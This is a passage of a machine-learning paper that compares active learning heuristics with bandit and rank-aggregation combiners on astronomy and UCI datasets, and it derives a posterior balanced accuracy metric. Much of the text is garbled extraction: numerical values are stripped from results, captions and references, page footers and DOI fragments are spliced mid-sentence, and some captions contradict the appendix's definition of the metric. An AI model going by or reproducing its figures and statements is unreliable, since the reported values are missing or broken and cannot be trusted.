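the classifier described above (logistic regression on a random-kitchen-sinks approximation of the gaussian kernel, with standardized features) can be assembled in scikit-learn roughly as follows; the kernel parameter, the number of random features, and the regularization constant are placeholder values rather than the ones tuned in the experiments.

```python
import numpy as np
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.kernel_approximation import RBFSampler
from sklearn.linear_model import LogisticRegression

# approximate gaussian-kernel logistic regression via random kitchen sinks
model = make_pipeline(
    StandardScaler(),
    RBFSampler(gamma=0.1, n_components=100, random_state=0),
    LogisticRegression(C=1.0, penalty="l2", max_iter=1000),
)

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 8))
y = (X[:, 0] * X[:, 1] > 0).astype(int)   # a non-linear toy target
model.fit(X, y)
print(model.predict_proba(X[:3]))         # class probability estimates for the heuristics
```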
the mpba can be thought of as the expected value of the average recall, where we treat the recall as a random variable that follows a beta distribution. compared to the raw accuracy score, this metric takes class imbalance into account: we first calculate the recall in each class and then take the average, thus giving each class an equal weight. refer to appendix a for the derivation of the mpba, which extends brodersen et al.'s formula from the binary to the multiclass setting.

in total, we test 17 query strategies: passive learning, eight active learning heuristics, five bandit algorithms, and three aggregation methods. the bandit algorithms include the four described in "combining suggestions with bandit theory" and a baseline called explore, which simply selects a random heuristic at each time step; in other words, we ignore the rewards and explore 100% of the time. for all bandit and rank aggregation methods, we take advice from six representative experts: passive, confidence, margin, entropy, qbb-margin, and qbb-kl. we have not explored how adding the heuristics with information density weighting to the bandits would impact the performance. the table below lists the abbreviations associated with the methods.

table: summary of active learning heuristics and combiners used in the experiments.
passive (heuristic): passive learning
confidence (heuristic): least confidence heuristic
w-confidence (heuristic): least confidence heuristic with information density weighting
margin (heuristic): smallest margin heuristic
w-margin (heuristic): smallest margin heuristic with information density weighting
entropy (heuristic): highest entropy heuristic
w-entropy (heuristic): highest entropy heuristic with information density weighting
qbb-margin (heuristic): smallest qbb margin heuristic
qbb-kl (heuristic): largest qbb kl-divergence heuristic
explore (bandit): bandit algorithm with 100% exploration
thompson (bandit): thompson sampling
ocucb (bandit): optimally confident ucb algorithm
klucb (bandit): kl-ucb algorithm
exp3++ (bandit): exp3++ algorithm
borda (aggregation): aggregation with borda count
geometric (aggregation): aggregation with the geometric mean
schulze (aggregation): aggregation with the schulze method

given that there are 12 datasets, each with many learning curves, we need a measure that summarizes in one number how well a particular heuristic or policy does. building on baram, el-yaniv & luz's deficiency measure, we define the strength of an active learner or a combiner relative to passive learning as

$\mathrm{strength}(h; m) = 1 - \dfrac{\sum_{t=1}^{n} \left( m(\max) - m(h, t) \right)}{\sum_{t=1}^{n} \left( m(\max) - m(\mathrm{passive}, t) \right)}$

where $m$ is a chosen metric (e.g., accuracy rate, mpba), $m(\max)$ is the best possible performance, and $m(h, t)$ is the performance achieved using the first $t$ examples selected by heuristic $h$. the best possible performance in each trial is the higher of (1) the performance achieved by using all the labeled examples in the training set and (2) the maximum value of the learning curves of all the methods. we can think of the summation as the area between the best-possible-performance line and the learning curve of $h$: the better the heuristic is, the faster it approaches this maximum line, and thus the smaller the area. finally, so that we can compare performance across datasets, we normalize the measure with the area obtained from using just passive learning. refer to the figure below for a visualization of the strength measure.

figure: an illustration of the mpba strength measure. it is proportional to the shaded area between the passive learning curve and the active learning curve: the bigger the area, the more the active learner outperforms the passive learner. the top dotted line indicates the maximum performance achieved.
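the strength measure can be computed directly from a learning curve and the passive-learning baseline, as in the following sketch; the curves shown are placeholder values.

```python
import numpy as np

def strength(curve_h, curve_passive, m_max):
    """strength of a heuristic relative to passive learning for one trial.

    curve_h, curve_passive: performance (e.g., mpba) after each labeled example.
    m_max: best achievable performance used as the reference line.
    """
    area_h = np.sum(m_max - np.asarray(curve_h))
    area_passive = np.sum(m_max - np.asarray(curve_passive))
    return 1.0 - area_h / area_passive

# placeholder learning curves over five queries
passive = [0.60, 0.63, 0.66, 0.68, 0.70]
active = [0.62, 0.67, 0.71, 0.73, 0.74]
print(strength(active, passive, m_max=0.80))   # > 0 means better than passive learning
```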
we evaluate the algorithm performance with two metrics: the accuracy score and the mpba. the accuracy score is the percentage of instances in the test set where the predicted label matches the true label; if a dataset has a dominant class, the accuracy on that class will also dominate the overall accuracy score. the mpba, on the other hand, puts an equal weight on each class and thus favors algorithms that can predict the labels of all classes equally well.

the heuristics with information density weighting and thompson sampling have a few additional hyperparameters. to investigate their effect, we pick one binary dataset (ionosphere) and one multiclass dataset (glass); both are small enough to let us iterate through many hyperparameter values quickly. with w-confidence, w-margin, and w-entropy, we set $\gamma$ in the gaussian kernel to be the inverse of a percentile of all pairwise distances, which appears to work well, as shown in the figure on the effect of $\gamma$ below. for thompson, the prior values of $m$ and $s^2$ and the value of $\tau^2$ seem to have little effect on the final performance, and we set them to small fixed values.

figure: effect of $\gamma$ on w-confidence and w-margin using the glass and ionosphere datasets, examining six values of $\gamma$ set from percentiles of the pairwise l2-distances between data points. for the glass dataset (a), changing the value of $\gamma$ has minimal effect on the results, while for the ionosphere dataset (b), the larger percentiles seem to work well.

results

the strength boxplots show the strengths of all methods that we consider, while separate figures provide selected learning curves. plots are grouped into the six small datasets (glass, ionosphere, iris, sonar, wine, and wpbc), the two medium-sized datasets (pima and vehicle), and the four large datasets (magic, miniboone, pageblocks, and sdss); each figure contains two subfigures, one reporting the raw accuracy score and the other the mpba score.

active learning methods generally beat passive learning in four of the six small datasets: glass, ionosphere, iris, and wine. this can be seen from the fact that the boxplots are mostly above the zero line. for sonar and wpbc, the results are mixed, and active learning has little to no effect. the wpbc dataset is particularly noisy, and our classifier cannot achieve a high mpba score on it, so it is not surprising that active learning does not perform well here: there is not much to learn to begin with.

the advantage of active learning becomes more apparent with the larger datasets like magic, miniboone, pageblocks, and sdss. here there is a visible gap between the passive learning curve and the active learning curve for most methods.
/peerj-cs. https://peerj.com/computer-science/ passive learning curve and the active learning curve for most methods. for instance, using a simple heuristic such as confidence in the pageblocks dataset results in an average mpba score of % after , examples, while passive learning can only achieves % (see fig. f). out of the eight active learning heuristics tested, the heuristics with the information density weighting (w-confidence, w-margin, and w-entropy) generally perform worse than the ones without the weighting. qbb-kl performs the best in pageblocks while it can barely beat passive learning in other datasets. the remaining heuristics—confidence, margin, entropy, and qbb-margin—perform equally well in all datasets. we find no difference in performance between the bandit algorithms and the rank aggregation methods. combining active learners does not seem to hurt the performance, even if we include a poorly performing heuristic such as qbb-kl. for bandit algorithms, it is interesting to note that thompson favors certain heuristics a lot more than others, while the behavior of exp ++, ocucb, and klucb is almost figure effect of the initial values of the parameters in thompson. we test combinations of m, s , and t on the glass (a) and ionosphere (b) dataset. varying these values does not seem to affect the final performance. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure boxplots of the accuracy and mpba strength of the active learning strategies, relative to passive learning, using the small datasets (glass, ionosphere, iris, sonar, wine, and wpbc). the more positive the strength is, the better the heuristic/combiner is. gray boxes represent individual heuristics; blue boxes represent bandit algorithms, and red boxes are for rank aggregation methods. a strategy that is above the zero line is better than passive learning. each boxplot contains trials. the accuracy score (a, c, e, g, i, and k) is a simple metric that simply counts up the number of correct predictions. the mpba score (b, d, f, h, j, and l), being the weighted average of the recall and precision, gives an equal representation to each class. the boxes represent the quartiles and the whiskers extend to . times of the interquartile range. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure boxplots of the accuracy and mpba strength of the active learning strategies, relative to passive learning, using medium to the large datasets (magic, miniboone, pageblocks, pima, sdss, and vehicle). the more positive the strength is, the better the heuristic/combiner is. gray boxes represent individual heuristics; blue boxes represent bandit algorithms, and red boxes are for rank aggregation methods. a strategy that is above the zero line is better than passive learning. each boxplot contains trials. the accuracy score (a, c, e, g, i, and k) is a simple metric that simply counts up the number of correct predictions. the mpba score (b, d, f, h, j, and l), being the weighted average of the recall and precision, gives an equal representation to each class. the boxes represent the quartiles and the whiskers extend to . times of the interquartile range. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure selected accuracy and mpba learning curves for the small datasets (glass, ionosphere, iris, sonar, wine, and wpbc). as it would get too cluttered to plot learning curves, we only show the accuracy (a, c, e, g, i, and k) and mpba (b, d, f, h, j, and l) learning curves for passive, confidence, exp ++, and borda. the learning curves are averaged over trials. the dotted horizontal line shows the performance obtained from using the whole training data. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure selected accuracy and mpba learning curves for the medium to large datasets (magic, miniboone, pageblocks, pima, sdss, and vehicle). as it would get too cluttered to plot learning curves, we only show the accuracy (a, c, e, g, i, and k) and mpba (b, d, f, h, j, and k) learning curve for passive, confidence, exp ++, and borda. the learning curves are averaged over trials. the dotted horizontal line shows the performance obtained from using the whole training data. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure selection frequencies of heuristics in thompson and exp ++, with the large datasets (magic, miniboone, pageblocks, pima, sdss, and vehicle). the plots show how often each of the heuristics gets selected over time. the selection frequencies are averaged over trials. thompson (a–f) favors certain heuristics more strongly than others. in contrast, exp ++ (g–l) favors uniform exploration more, sampling each heuristic with roughly equal weights. the plots for ocucb and klucb are not shown here, but they are similar to exp ++. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure the effect of the initial values of the parameters in thompson on the heuristic selection frequencies. we test combinations of m, s , and t on the glass and ionosphere dataset. which heuristics thompson picks seems to correlate with the heuristic performance. for example, in ionosphere, passive (the dotted purple line) and qbb-kl (the dashed dark blue line) tend to get picked less often than others. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ indistinguishable from explore, where we explore % of the time (see fig. ). changing the initial values of m, s , and t changes the order of preference slightly, but overall, which heuristics thompson picks seems to correlate with the heuristic performance. for example, as shown in fig. , passive and qbb-kl tend to get chosen less often than others in the ionosphere dataset. discussion the experimental results allow us to answer the following questions: . can active learning beat passive learning? yes, active learning can perform much better than passive learning, especially when the unlabeled pool is large (e.g., sdss, miniboone, pageblock). 
when the unlabeled pool is small, the effect of active learning becomes less apparent, as there are now fewer candidates to choose from. this can be seen in fig. , where we show that artificially reducing the unlabeled pool results in a reduction in the final performance. at the same time, having a small test set also makes the gap between the active learning curve and the passive learning curve smaller (see figs. c and f). this further contributes to the poorer performance on the smaller datasets. in any case, when a dataset is small, we can label everything so active learning is usually not needed. figure effect of the pool size on the learning curves. we pick two large datasets—pageblocks and sdss—to investigate how the size of the pool affects the performance. (a) and (d) are the original learning curves from figs. f and j (we only show the first examples so that all figures have the same scale). for (b) and (e), we use the same test pool, but the unlabeled pool now only has a maximum of candidates. finally, for (c) and (f) the combined test pool and training pool have a size of . full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . can active learning degrade performance? yes, there is no guarantee that active learning will always beat passive learning. for example, w-entropy actually slows down the learning in the many datasets. however, this only happens with certain heuristics, like those using the information density weighting. . what is the best single active learning heuristic? all of confidence, margin, entropy, and qbb-margin have a similar performance. however confidence is perhaps the simplest to compute and thus is a good default choice in practice. . what are the challenges in using bandit algorithms? (a) designing a good reward scheme is difficult. this paper uses the increase in the classifier performance as the reward. however this type of reward is non-stationary (i.e., it gets smaller after each step as learning saturates) and the rewards will thus eventually go to zero. (b) in practice, we do not have a representative test set that can be used to compute the reward. as a workaround, hsu & lin ( ) computed the reward on the training set and then used importance weighting to remove any potential bias. for this to work, we need to ensure that every training example and every active learning suggestion have a non-zero probability of being selected in each step. (c) finally, some bandit algorithms such as thompson sampling assumes that the reward follows a certain distribution (e.g., gaussian). however, this assumption is unrealistic. . what are the challenges in using rank aggregation algorithms? (a) we need to compute the scores from all heuristics at every time step. this might not be feasible if there are too many heuristics or if we include heuristics that require a large amount of compute power (e.g., variance minimization). (b) the schulze method uses o(n ) space, where n is the number of candidates. this might lead to memory issues if we need to rank a large number of candidates from the unlabeled pool. (c) before aggregating the rankings, we throw away the score magnitudes, which could cause a loss of information. (d) unlike bandit algorithms, all of the rank aggregators always give each heuristic an equal weight. . which method should i use in practice to combine active learners? 
since there is no difference in performance between various combiners, we recommend using a simple rank aggregator like borda count or geometric mean if we do not want to select a heuristic a priori. rank aggregators do not need a notion of a reward—we simply give all suggestions an equal weight when combining. thus we neither need to a keep a separate test set, nor do we need to worry about designing a good reward scheme. tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ our investigation has a few limitations. firstly, we empirically compare algorithms that only work with single-label classification problems. nowadays, many problems require multi-label learning, in which each example is allowed to be in more than one class. our methods can be extended to work with multi-label datasets with the following modifications. we first need a multi-label classifier. this can be as simple as a collection of binary classifiers, each of which produces the probability that an example belongs to a particular class. for each class, we can use an active learning heuristic to assign a score to each unlabeled example as before. however now we need to aggregate the scores among the classes. as suggested by reyes, morell & ventura ( ), we can use any aggregation method like borda count to combine these scores. in effect, the multi-label learning problem adds an extra layer of aggregation into the pipeline. another limitation of our methods is that our active learning methods are myopic. that is, in each iteration, we only pick one instance to give to a human expert for labeling. in many practical applications like astronomy, batch-mode active learning is preferred, as it is much more cost efficient to obtain multiple labels simultaneously. one naive extension is to simply choose the m highest ranked objects using our current methods. however, it is possible to have two unlabeled objects whose class membership we are currently uncertain about, but because they have very similar feature vectors, labeling only one of them would allow us to predict the label of the other one easily. more sophisticated batch-mode active learning approaches have been proposed to take into account other factors such as the diversity of a batch and the representativeness of each batch example. these approaches include looking at the angles between hyperplanes in support vector machines (brinker, ), using cluster analysis (xu, akella & zhang, ), and using an evolutionary algorithm (reyes & ventura, ). how to aggregate suggestions from these approaches is an interesting problem for future work. conclusion in this paper we compared active learning methods with passive learning. our three main findings are: active learning is better than passive learning; combining active learners does not in general degrade the performance; and social choice theory provides more practical algorithms than bandit theory since we do not need to design a reward scheme. appendix a: posterior balanced accuracy most real-world datasets are unbalanced. in the sdss dataset, for example, there are . times as many galaxies as quasars. the problem of class imbalance is even more severe in the pageblocks dataset, where one class makes up % of the data and the remaining four classes only make up %. an easy fix is to under sample the dominant class when creating the training and test sets. this, of course, means that the size of these sets are limited by the size of the minority class. 
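As a concrete illustration of this fix (a sketch only; the function and variable names are not from the paper), every class can be undersampled to the size of the smallest class before the training and test sets are created:

```python
import numpy as np

def undersample(X, y, seed=0):
    """Keep an equal number of examples per class (the minority-class count)."""
    rng = np.random.default_rng(seed)
    classes, counts = np.unique(y, return_counts=True)
    n_min = counts.min()
    keep = np.concatenate([
        rng.choice(np.flatnonzero(y == c), size=n_min, replace=False)
        for c in classes
    ])
    rng.shuffle(keep)
    return X[keep], y[keep]
```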
When we do not want to alter the underlying class distribution, or when larger training and test sets are desired, we need a performance measure that corrects for the class imbalance. Brodersen et al. show that the posterior balanced accuracy distribution can overcome this bias in the binary case. We now extend the idea to the multiclass setting.

Suppose we have k classes. For each class i between 1 and k, there are N_i objects in the universe. Given a classifier, we can predict the label of every object and compare our prediction with the true label. Let G_i be the number of objects in class i that are correctly predicted. Then we define the recall a_i of class i as

a_i = \frac{G_i}{N_i}

The problem is that it is not feasible to obtain the actual values of G_i and N_i, since that would require the true label of every object in the universe. We therefore need to estimate these quantities from a sample. Initially we have no information about G_i and N_i, so we can assume that each a_i follows a uniform prior distribution between 0 and 1. This is the same as a beta distribution with shape parameters α = β = 1:

a_i \sim \mathrm{Beta}(1, 1)

The probability density function (pdf) of a_i is then

f_{a_i}(a) = \frac{\Gamma(\alpha + \beta)}{\Gamma(\alpha)\,\Gamma(\beta)}\, a^{\alpha - 1} (1 - a)^{\beta - 1} \propto a^{1 - 1} (1 - a)^{1 - 1}

where Γ(·) is the gamma function. After we have trained the classifier, suppose we have a test set containing n_i objects in class i. Running the classifier on this test set is the same as conducting k binomial experiments, where, in the i-th experiment, the sample size is n_i and the probability of success is simply a_i. Let g_i be the number of correctly labeled objects belonging to class i in the test set. Then, conditional on the recall rate a_i, g_i follows a binomial distribution:

(g_i \mid a_i) \sim \mathrm{Bin}(n_i, a_i)

The probability mass function of (g_i | a_i = a) is thus

p_{g_i \mid a_i}(g_i) = \binom{n_i}{g_i} a^{g_i} (1 - a)^{n_i - g_i} \propto a^{g_i} (1 - a)^{n_i - g_i}

In the Bayesian setting, the beta density is the prior and the binomial mass function is the likelihood. To get the posterior pdf, we simply multiply the prior by the likelihood:

f_{a_i \mid g}(a) \propto f_{a_i}(a) \cdot p_{g_i \mid a_i}(g_i) \propto a^{1 - 1} (1 - a)^{1 - 1} \cdot a^{g_i} (1 - a)^{n_i - g_i} = a^{(1 + g_i) - 1} (1 - a)^{(1 + n_i - g_i) - 1}

Thus the beta distribution is conjugate to the binomial likelihood: the posterior recall rate a_i also follows a beta distribution, now with parameters

(a_i \mid g_i) \sim \mathrm{Beta}(1 + g_i,\; 1 + n_i - g_i)

Our goal is a balanced accuracy rate A that puts an equal weight on each class. One way to achieve this is to take the average of the individual recalls:

A = \frac{1}{k} \sum_{i=1}^{k} a_i = \frac{1}{k} A_T

Here we have defined A_T to be the sum of the individual recalls. We call (A | g) the posterior balanced accuracy, where g = (g_1, ..., g_k). Most of the time, we simply want to calculate its expected value:

E[A \mid g] = \frac{1}{k} E[A_T \mid g] = \frac{1}{k} \int a \, f_{A_T \mid g}(a) \, da

Let us call this the MPBA. Note that there is no closed-form solution for the pdf f_{A_T|g}(a). However, assuming that A_T is a sum of k independent beta random variables, f_{A_T|g}(a) can be approximated by numerically convolving k beta distributions; a minimal sketch of this approximation is given below. The independence assumption is reasonable here, since there should be little to no correlation between the individual recall rates.
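The following sketch (Python with SciPy; the grid resolution, function names, and toy counts are illustrative assumptions, not the authors' code, which lives in the repository cited below) approximates the density of A_T by convolving the per-class Beta posteriors on a regular grid and then computes the MPBA:

```python
import numpy as np
from scipy import stats

def mpba(g, n, grid_size=2001):
    """Mean posterior balanced accuracy for per-class correct counts g and test sizes n.

    Each class recall has posterior Beta(1 + g_i, 1 + n_i - g_i); assuming the
    recalls are independent, the density of their sum A_T is the convolution of
    the k posteriors, approximated here on a regular grid over [0, k].
    """
    step = 1.0 / (grid_size - 1)
    a = np.linspace(0.0, 1.0, grid_size)

    density = None
    for gi, ni in zip(g, n):
        f = stats.beta.pdf(a, 1 + gi, 1 + ni - gi)
        density = f if density is None else np.convolve(density, f) * step

    support = np.arange(len(density)) * step       # grid of A_T values on [0, k]
    density = density / (density.sum() * step)     # renormalize away discretization error
    mean_at = (support * density).sum() * step     # E[A_T | g]
    return mean_at / len(g)                        # MPBA = E[A_T | g] / k

# Toy example with three classes (illustrative counts only).
print(mpba(g=[45, 30, 8], n=[50, 40, 10]))
```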
The independence assumption is plausible because, for example, knowing that a classifier is really good at recognizing stars does not tell us much about how well that classifier can recognize galaxies. Having the full distribution f_{A|g}(a), rather than just its mean, also allows us to make violin plots, construct confidence intervals, and do hypothesis tests. To get an expression for it, let us first rewrite the cumulative distribution function as

F_{A \mid g}(a) = P(A \le a \mid g) = P\left(\tfrac{1}{k} A_T \le a \mid g\right) = P(A_T \le k a \mid g) = F_{A_T \mid g}(k a)

Differentiating with respect to a, we obtain the pdf of (A | g):

f_{A \mid g}(a) = \frac{\partial}{\partial a} F_{A_T \mid g}(k a) = \frac{\partial (k a)}{\partial a} \cdot \frac{\partial}{\partial (k a)} F_{A_T \mid g}(k a) = k \, f_{A_T \mid g}(k a)

A Python implementation of the posterior balanced accuracy can be found in our GitHub repository (https://github.com/chengsoonong/mclass-sky).

Additional Information and Declarations

Funding
The research was supported by the Data to Decisions Cooperative Research Centre, whose activities are funded by the Australian Commonwealth Government's Cooperative Research Centres Programme. This research was also supported by the Australian Research Council Centre of Excellence for All-sky Astrophysics (CAASTRO), through project number CE. The SDSS dataset was extracted from a data release of SDSS-III. Funding for SDSS-III has been provided by the Alfred P. Sloan Foundation, the Participating Institutions, the National Science Foundation, and the U.S. Department of Energy Office of Science. The SDSS-III web site is http://www.sdss3.org/. SDSS-III is managed by the Astrophysical Research Consortium for the Participating Institutions of the SDSS-III Collaboration, including the University of Arizona, the Brazilian Participation Group, Brookhaven National Laboratory, Carnegie Mellon University, University of Florida, the French Participation Group, the German Participation Group, Harvard University, the Instituto de Astrofisica de Canarias, the Michigan State/Notre Dame/JINA Participation Group, Johns Hopkins University, Lawrence Berkeley National Laboratory, Max Planck Institute for Astrophysics, Max Planck Institute for Extraterrestrial Physics, New Mexico State University, New York University, Ohio State University, Pennsylvania State University, University of Portsmouth, Princeton University, the Spanish Participation Group, University of Tokyo, University of Utah, Vanderbilt University, University of Virginia, University of Washington, and Yale University. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

Grant Disclosures
The following grant information was disclosed by the authors:
Australian Commonwealth Government's Cooperative Research Centres Programme.
Australian Research Council Centre of Excellence for All-sky Astrophysics (CAASTRO).

Competing Interests
The authors declare that they have no competing interests.

Author Contributions
- Alasdair Tran conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
- Cheng Soon Ong conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
- Christian Wolf authored or reviewed drafts of the paper, and approved the final draft.
data availability the following information was supplied regarding data availability: the code of the experiments can be found at https://github.com/chengsoonong/mclass-sky. tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.sdss .org/ https://github.com/chengsoonong/mclass-sky http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references alam s, albareti fd, prieto ca, anders f, anderson sf, andrews bh, armengaud e, aubourg é, bailey s, bautista je, beaton rl, beers tc, bender cf, berlind aa, beutler f, bhardwaj v, bird jc, bizyaev d, blake ch, blanton mr, blomqvist m, bochanski jj, bolton as, bovy j, bradley as, brandt wn, brauer de, brinkmann j, brown pj, brownstein jr, burden a, burtin e, busca ng, cai z, capozzi d, rosell ac, carrera r, chen y, chiappini c, chojnowski sd, chuang c, clerc n, comparat j, covey k, croft rac, cuesta aj, cunha k, da costa ln, rio nd, davenport jra, dawson ks, lee nd, delubac t, deshpande r, dutra-ferreira l, dwelly t, ealet a, ebelke gl, edmondson em, eisenstein dj, escoffier s, esposito m, fan x, fernández-alvar e, feuillet d, ak nf, finley h, finoguenov a, flaherty k, fleming sw, font-ribera a, foster j, frinchaboy pm, galbraith-frew jg, garcı́a-hernández da, pérez aeg, gaulme p, ge j, génova-santos r, ghezzi l, gillespie ba, girardi l, goddard d, gontcho sga, hernández jig, grebel ek, grieb jn, grieves n, gunn je, guo h, harding p, hasselquist s, hawley sl, hayden m, hearty fr, ho s, hogg dw, holley-bockelmann k, holtzman ja, honscheid k, huehnerhoff j, jiang l, johnson ja, kinemuchi k, kirkby d, kitaura f, klaene ma, kneib j, koenig xp, lam cr, lan t, lang d, laurent p, goff jl, leauthaud a, lee k, lee ys, licquia tc, liu j, long dc, lópez-corredoira m, lorenzo-oliveira d, lucatello s, lundgren b, lupton rh, mack ce iii, mahadevan s, maia mag, majewski sr, malanushenko e, malanushenko v, manchado a, manera m, mao q, maraston c, marchwinski rc, margala d, martell sl, martig m, masters kl, mcbride ck, mcgehee pm, mcgreer id, mcmahon rg, ménard b, menzel m, merloni a, mészáros s, miller aa, miralda-escudé j, miyatake h, montero-dorta ad, more s, morice-atkinson x, morrison hl, muna d, myers ad, newman ja, neyrinck m, nguyen dc, nichol rc, nidever dl, noterdaeme p, nuza se, o’connell je, o’connell rw, o’connell r, ogando rlc, olmstead md, oravetz ae, oravetz dj, osumi k, owen r, padgett dl, padmanabhan n, paegert m, palanque-delabrouille n, pan k, parejko jk, park c, pâris i, pattarakijwanich p, pellejero- ibanez m, pepper j, percival wj, pérez-fournon i, pérez-ràfols i, petitjean p, pieri mm, pinsonneault mh, de mello gfp, prada f, prakash a, price-whelan am, raddick mj, rahman m, reid ba, rich j, rix h, robin ac, rockosi cm, rodrigues ts, rodrı́guez-rottes s, roe na, ross aj, ross np, rossi g, ruan jj, rubiño-martı́n ja, rykoff es, salazar-albornoz s, salvato m, samushia l, sánchez ag, santiago b, sayres c, schiavon rp, schlegel dj, schmidt sj, schneider dp, schultheis m, schwope ad, scóccola cg, sellgren k, seo h, shane n, shen y, shetrone m, shu y, sivarani t, skrutskie mf, slosar a, smith vv, sobreira f, stassun kg, steinmetz m, strauss ma, streblyanska a, swanson mec, tan jc, tayar j, terrien rc, thakar ar, thomas d, thompson ba, tinker jl, tojeiro r, troup nw, vargas- magaña m, vazquez ja, verde l, viel m, vogt np, wake da, wang j, weaver ba, weinberg dh, weiner bj, white m, wilson jc, wisniewski jp, wood-vasey wm, yèche c, york dg, zakamska nl, zamora o, zasowski g, zehavi i, zhao g, zheng z, zhou x, zhou z, zhu g, 
zou h. . the eleventh and twelfth data releases of the sloan digital sky survey: final data from sdss-iii. the astrophysical journal supplement series : . audibert j-y, munos r, szepesvári c. . exploration–exploitation tradeoff using variance estimates in multi-armed bandits. theoretical computer science ( ): – doi . /j.tcs. . . . auer p, cesa-bianchi n, fischer p. a. finite-time analysis of the multiarmed bandit problem. machine learning ( – ): – . auer p, cesa-bianchi n, freund y, schapire re. b. the nonstochastic multiarmed bandit problem. siam journal on computing ( ): – doi . /s . tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.tcs. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ baram y, el-yaniv r, luz k. . online choice of active learning algorithms. journal of machine learning research : – . bedö j, ong cs. . multivariate spearman’s ρ for aggregating ranks using copulas. journal of machine learning research ( ): – . berry da, fristedt b. . bandit problems: sequential allocation of experiments (monographs on statistics and applied probability). vol. . london: chapman and hall, – . breiman l, friedman j, stone cj, olshen ra. . classification and regression trees. boca raton: crc press. brinker k. . incorporating diversity in active learning with support vector machines. in: proceedings of the twentieth international conference on international conference on machine learning, icml’ . palo alto: aaai press, – . brodersen kh, ong cs, stephan ke, buhmann jm. . the balanced accuracy and its posterior distribution. in: proceedings of the th international conference on pattern recognition, icpr ‘ . washington, d.c.: ieee computer society, – . cappé o, garivier a, maillard o-a, munos r, stoltz g. . kullback-leibler upper confidence bounds for optimal sequential allocation. annals of statistics ( ): – doi . / -aos . culotta a, mccallum a. . reducing labeling effort for structured prediction tasks. in: proceedings of the th national conference on artificial intelligence–volume , aaai’ . palo alto: aaai press, – . freund y, schapire re. . experiments with a new boosting algorithm. in: proceedings of the thirteenth international conference on international conference on machine learning, icml’ . san francisco: morgan kaufmann publishers inc., – . freund y, seung hs, shamir e, tishby n. . selective sampling using the query by committee algorithm. machine learning ( – ): – . hsu w-n, lin h-t. . active learning by learning. in: aaai. palo alto: aaai press, – . lattimore t. . optimally confident ucb: improved regret for finite-armed bandits. corr. available at http://arxiv.org/abs/ . . lewis dd, gale wa. . a sequential algorithm for training text classifiers. in: proceedings of the th annual international acm sigir conference on research and development in information retrieval. new york: springer-verlag, – . lichman m. . uci machine learning repository. available at http://archive.ics.uci.edu/ml. list c. social choice theory. available at https://plato.stanford.edu/entries/social-choice/. mccallum a, nigam k. . employing em and pool-based active learning for text classification. in: proceedings of the fifteenth international conference on machine learning, icml ‘ . san francisco: morgan kaufmann publishers inc., – . melville p, mooney rj. . diverse ensembles for active learning. in: proceedings of the twenty- first international conference on machine learning. new york: acm, . 
pedregosa f, varoquaux g, gramfort a, michel v, thirion b, grisel o, blondel m, prettenhofer p, weiss r, dubourg v, vanderplas j, passos a, cournapeau d, brucher m, perrot m, duchesnay e. . scikit-learn: machine learning in python. journal of machine learning research : – . rahimi a, recht b. . random features for large-scale kernel machines. advances in neural information processing systems. usa: curran associates inc., – . tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / -aos http://arxiv.org/abs/ . http://archive.ics.uci.edu/ml https://plato.stanford.edu/entries/social-choice/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reichart r, tomanek k, hahn u, rappoport a. . multi-task active learning for linguistic annotations. in: proceedings of acl- : hlt. stroudsburg: association for computational linguistics, – . reyes o, morell c, ventura s. . effective active learning strategy for multi-label learning. neurocomputing : – doi . /j.neucom. . . . reyes o, ventura s. . evolutionary strategy to perform batch-mode active learning on multi- label data. acm transactions on intelligent systems and technology ( ): : : doi . / . scheffer t, decomain c, wrobel s. . active hidden markov models for information extraction. in: advances in intelligent data analysis. vol. . berlin/heidelberg: springer, – . schein ai, ungar lh. . active learning for logistic regression: an evaluation. machine learning ( ): – doi . /s - - - . schulze m. . a new monotonic, clone-independent, reversal symmetric, and condorcet- consistent single-winner election method. social choice and welfare ( ): – doi . /s - - - . seldin y, slivkins a. . one practical algorithm for both stochastic and adversarial bandits. in: proceedings of the st international conference on machine learning. bejing: pmlr, – . settles b. . active learning. synthesis lectures on 